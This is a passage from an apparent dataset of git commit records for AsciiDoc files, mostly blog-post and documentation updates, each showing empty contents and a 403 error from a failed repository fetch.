403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1700b3ab55f6ff03c910f269af98a649128d9521","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00f9e2bd0c8dbe702fa103167d7d4ab68eeefe27","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf426c67eb8d5a1f8f5845e41528750d3ea01d4c","subject":"Add readme template","message":"Add readme template\n","repos":"chevdor\/generator-chocolatey","old_file":"app\/templates\/_readme.adoc","new_file":"app\/templates\/_readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chevdor\/generator-chocolatey.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6df26c987c1df2ab067e7ff1b5b09ca268f79542","subject":"y2b create post Is The LG V30 The Most Underrated Smartphone?","message":"y2b create post Is The LG V30 The Most Underrated Smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-03-Is%20The%20LG%20V30%20The%20Most%20Underrated%20Smartphone%3F.adoc","new_file":"_posts\/2018-02-03-Is%20The%20LG%20V30%20The%20Most%20Underrated%20Smartphone%3F.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f037a6205ce59cdb0ab6a23540407b93aa9f8f90","subject":"Create spec.adoc","message":"Create spec.adoc","repos":"clara-labs\/react-popover,gregory90\/react-popover,rainforestapp\/react-popover,t3chnoboy\/react-popover,prayogoa\/react-popover,littlebits\/react-popover,derekr\/react-popover","old_file":"spec.adoc","new_file":"spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/derekr\/react-popover.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62d7c0675b6e386571a96169bd39c26f59442733","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc5de9841c4458a6a4e5f5015d53c0c3ee1812c","subject":"y2b create post PlayStation Move Sharp Shooter Unboxing \\u0026 Overview","message":"y2b create post PlayStation Move Sharp Shooter Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-26-PlayStation-Move-Sharp-Shooter-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-26-PlayStation-Move-Sharp-Shooter-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66b820b7cfd7c493eb0fb23a2ccef7c9863c5974","subject":"Update 2016-06-07-Folding-the-Universe-part-I-I-I-Java-8-List-and-Stream.adoc","message":"Update 2016-06-07-Folding-the-Universe-part-I-I-I-Java-8-List-and-Stream.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-06-07-Folding-the-Universe-part-I-I-I-Java-8-List-and-Stream.adoc","new_file":"_posts\/2016-06-07-Folding-the-Universe-part-I-I-I-Java-8-List-and-Stream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a4dd4ff3aab53a2f414feaf74291463503529a4","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccf780a46b01fb16b5cbb6785c590d7ab0b50cf5","subject":"Publish 20161110-1347.adoc","message":"Publish 20161110-1347.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1347.adoc","new_file":"20161110-1347.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8385fb00767871b9f11d78324f8cf4cbc4ca27d","subject":"edit Changelog","message":"edit Changelog\n","repos":"BernhardLindner\/Image-Generator","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BernhardLindner\/Image-Generator.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"605be9474a768bab872512f841f317e6f00bf2fc","subject":"Update 2017-01-24-Dealing-with-CORS-in-a-Development-Environment-Use-a-reverse-proxy.adoc","message":"Update 2017-01-24-Dealing-with-CORS-in-a-Development-Environment-Use-a-reverse-proxy.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2017-01-24-Dealing-with-CORS-in-a-Development-Environment-Use-a-reverse-proxy.adoc","new_file":"_posts\/2017-01-24-Dealing-with-CORS-in-a-Development-Environment-Use-a-reverse-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c2f9d63e96a6ced056957904e71901737a62c28","subject":"Update 2016-12-06-Line-Break-Doc-Title.adoc","message":"Update 2016-12-06-Line-Break-Doc-Title.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-06-Line-Break-Doc-Title.adoc","new_file":"_posts\/2016-12-06-Line-Break-Doc-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"284108e00ee0a4011b62e7e32f122abf923544f8","subject":"y2b create post The Secret Android Button","message":"y2b create post The Secret Android Button","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-13-The-Secret-Android-Button.adoc","new_file":"_posts\/2016-04-13-The-Secret-Android-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4367adffe6ba33d13eb1b968dd5898bf557245c3","subject":"[DOCS] Fixed typo.","message":"[DOCS] Fixed typo.\n\nOriginal commit: elastic\/x-pack-elasticsearch@e09feb4863c5760b5264a0cf9e464099a9963454\n","repos":"GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,gingerwizard\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/en\/setup-xes.asciidoc","new_file":"docs\/en\/setup-xes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2946157734b2c3a43ff30305066c2991295d8c07","subject":"add changelog","message":"add changelog\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/memoization.java","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebhoss\/memoization.java.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"b22924276e26aa92afce30acd3b7ee36d27c453e","subject":"Update 2016-12-13-How-to-use-CXF-3x-implementation-of-JAX-RS-20-REST-with-Weblogic-12c.adoc","message":"Update 2016-12-13-How-to-use-CXF-3x-implementation-of-JAX-RS-20-REST-with-Weblogic-12c.adoc","repos":"jerometambo\/blog,jerometambo\/blog,jerometambo\/blog,jerometambo\/blog","old_file":"_posts\/2016-12-13-How-to-use-CXF-3x-implementation-of-JAX-RS-20-REST-with-Weblogic-12c.adoc","new_file":"_posts\/2016-12-13-How-to-use-CXF-3x-implementation-of-JAX-RS-20-REST-with-Weblogic-12c.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jerometambo\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1ad4cc6c20e025218bf396b5bd6472661033abb","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d65c27e8e4edb1206dbce94ae8964ce51fd25c1","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2321f5f905d84e938b238dbae382f2a3e3b87151","subject":"Updated readme title and remove old project link","message":"Updated readme title and remove old project link\n","repos":"javaslang\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"resilience4j-retrofit\/README.adoc","new_file":"resilience4j-retrofit\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"beff04687fa6500d92572e15f701467bf435f2d6","subject":"Non-obvious use of extra parameters","message":"Non-obvious use of extra parameters\n\nExtract them into separate `additional` optional object.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d08d07d75a8d5eb99709a6eb40ebe845f91fb9d1","subject":"Minor typo for `chain_id` parameter description","message":"Minor typo for `chain_id` parameter description\n\nFix it.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"720575ca411b4d9b5e34fc2cdfbaa044375b9f18","subject":"y2b create post Avenger Elite for XBOX 360 Controller Unboxing \\u0026 First Look","message":"y2b create post Avenger Elite for XBOX 360 Controller Unboxing \\u0026 First Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-18-Avenger-Elite-for-XBOX-360-Controller-Unboxing-u0026-First-Look.adoc","new_file":"_posts\/2014-04-18-Avenger-Elite-for-XBOX-360-Controller-Unboxing-u0026-First-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f571f916f2f2df4387e902500d83a8e36ff1d467","subject":"Update 2015-09-30-Installing-MySQL-ConnectorPython-using-pip-15-and-later.adoc","message":"Update 2015-09-30-Installing-MySQL-ConnectorPython-using-pip-15-and-later.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Installing-MySQL-ConnectorPython-using-pip-15-and-later.adoc","new_file":"_posts\/2015-09-30-Installing-MySQL-ConnectorPython-using-pip-15-and-later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"276b213a801c15556a58302b4de724e0a2640391","subject":"Delete the file at '_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","message":"Delete the file at '_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a74903814451fdc123c587f4f5cb23a31f06f1f3","subject":"Renamed '_posts\/2017-08-18-How-a-developer-could-short-their-way-on-the-Ansible-learning.adoc' to '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","message":"Renamed '_posts\/2017-08-18-How-a-developer-could-short-their-way-on-the-Ansible-learning.adoc' to '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3f0d0062f03b1b631ce48a8808e013669778208","subject":"Renamed '_posts\/2019-06-31-Kafka-integration-tests.adoc' to '_posts\/2019-07-02-Kafka-integration-tests.adoc'","message":"Renamed '_posts\/2019-06-31-Kafka-integration-tests.adoc' to '_posts\/2019-07-02-Kafka-integration-tests.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-07-02-Kafka-integration-tests.adoc","new_file":"_posts\/2019-07-02-Kafka-integration-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"873ea285a9bd5a5f2ef730b8fa5c8d10aa564d69","subject":"Update 2015-09-11-As.adoc","message":"Update 2015-09-11-As.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-11-As.adoc","new_file":"_posts\/2015-09-11-As.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73c7281a010d0278295754c53c57088bff64a307","subject":"Update 2016-05-17-Budapest-JS-2016-Part-I-the-workshop-about-Haxe.adoc","message":"Update 2016-05-17-Budapest-JS-2016-Part-I-the-workshop-about-Haxe.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-I-the-workshop-about-Haxe.adoc","new_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-I-the-workshop-about-Haxe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a52bd018d49eb92c88328b648193febb2687d54d","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b72501db8c99377aabafe928864804399045381","subject":"Update 2018-06-13-Chronicle-downloads-exceed-6-million-in-a-month.adoc","message":"Update 2018-06-13-Chronicle-downloads-exceed-6-million-in-a-month.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-06-13-Chronicle-downloads-exceed-6-million-in-a-month.adoc","new_file":"_posts\/2018-06-13-Chronicle-downloads-exceed-6-million-in-a-month.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ece864c14545dc062594c3a883531dbac47bc6f","subject":"Update 2017-05-27-Real-World-Example-for-Google-Cloud-Spanner-JPA-Hibernate.adoc","message":"Update 2017-05-27-Real-World-Example-for-Google-Cloud-Spanner-JPA-Hibernate.adoc","repos":"olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io","old_file":"_posts\/2017-05-27-Real-World-Example-for-Google-Cloud-Spanner-JPA-Hibernate.adoc","new_file":"_posts\/2017-05-27-Real-World-Example-for-Google-Cloud-Spanner-JPA-Hibernate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olavloite\/olavloite.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9a0bfe38fc7ac147a799fd040f09b710779dc21","subject":"changed \"details\" to \"detail\" for better flow","message":"changed \"details\" to \"detail\" for better flow","repos":"deepnarsay\/JGroups,deepnarsay\/JGroups,TarantulaTechnology\/JGroups,ligzy\/JGroups,dimbleby\/JGroups,belaban\/JGroups,dimbleby\/JGroups,rhusar\/JGroups,rpelisse\/JGroups,kedzie\/JGroups,rpelisse\/JGroups,ligzy\/JGroups,TarantulaTechnology\/JGroups,vjuranek\/JGroups,pferraro\/JGroups,danberindei\/JGroups,kedzie\/JGroups,danberindei\/JGroups,deepnarsay\/JGroups,pruivo\/JGroups,vjuranek\/JGroups,slaskawi\/JGroups,kedzie\/JGroups,pferraro\/JGroups,rpelisse\/JGroups,Sanne\/JGroups,rhusar\/JGroups,danberindei\/JGroups,TarantulaTechnology\/JGroups,belaban\/JGroups,pferraro\/JGroups,rhusar\/JGroups,slaskawi\/JGroups,slaskawi\/JGroups,pruivo\/JGroups,dimbleby\/JGroups,ligzy\/JGroups,vjuranek\/JGroups,belaban\/JGroups,pruivo\/JGroups,Sanne\/JGroups,Sanne\/JGroups","old_file":"doc\/manual\/blocks.adoc","new_file":"doc\/manual\/blocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pferraro\/JGroups.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"36445904cb16b69a01b0ae7ddb55144197ad44a7","subject":"docs: clarify guidelines on boost usage","message":"docs: clarify guidelines on boost usage\n\nChange-Id: I788ac1426a6a79192e1cdd88892cb2fa1a978b47\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5752\nReviewed-by: David Ribeiro Alves <78b9f953b197533e9b51c860b080869056433b48@apache.org>\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bc9f803f882d0608f794a2f69f529c5fe2c6b68","subject":"[doc] update on shared_ptr\/scoped_refptr pros\/cons","message":"[doc] update on shared_ptr\/scoped_refptr pros\/cons\n\nChange-Id: I46678a28a623c7b9c0835177e08a3f2393ed13c1\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4050\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Kudu Jenkins\n","repos":"EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fc8cc3a6c1b5f27d404bf7d8db17f3ac7101939","subject":"[doc] Remove beta upgrade reference","message":"[doc] Remove beta upgrade reference\n\nChange-Id: Ibde3132f3bffd1ca81d249fa9401d408dd47ff21\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6858\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans 